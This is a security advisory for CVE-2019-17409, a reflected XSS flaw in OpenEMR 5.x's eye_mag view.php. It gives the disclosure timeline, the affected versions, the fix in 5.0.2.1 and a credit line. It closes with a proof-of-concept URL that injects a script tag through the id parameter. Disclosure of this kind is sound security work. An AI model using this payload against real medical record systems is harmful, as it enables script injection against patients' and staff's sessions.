CVE-2019-17409
Reflected XSS exists in interface/forms/eye_mag/view.php in OpenEMR 5.x before 5.0.2.1 via the id parameter.
Timeline
- Discovered: October 8, 2019
- Pull Request Issued: October 9, 2019
- Reported: October 9, 2019
- OpenEMR merged pull Request: October 9, 2019
- CVE ID issued: October 9, 2019
- OpenEMR Release: October 10, 2019 (5.0.2.1)
Version Details
Fixed-In Version: 5.0.2.1
Affected Versions:
- 5.0.1
- 5.0.1.1
- 5.0.1.2
- 5.0.1.3
- 5.0.1.4
- 5.0.1.5
- 5.0.1.6
- 5.0.1.7
- 5.0.2
Credit
Will Porter, Lodestone Security (https://www.lodestonesecurity.com/)
References
POC Exploit
Assuming OpenEMR is running on localhost
http://localhost/openemr/interface/forms/eye_mag/view.php?id=xss%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ca%20href=%22#%22%20faketag=%22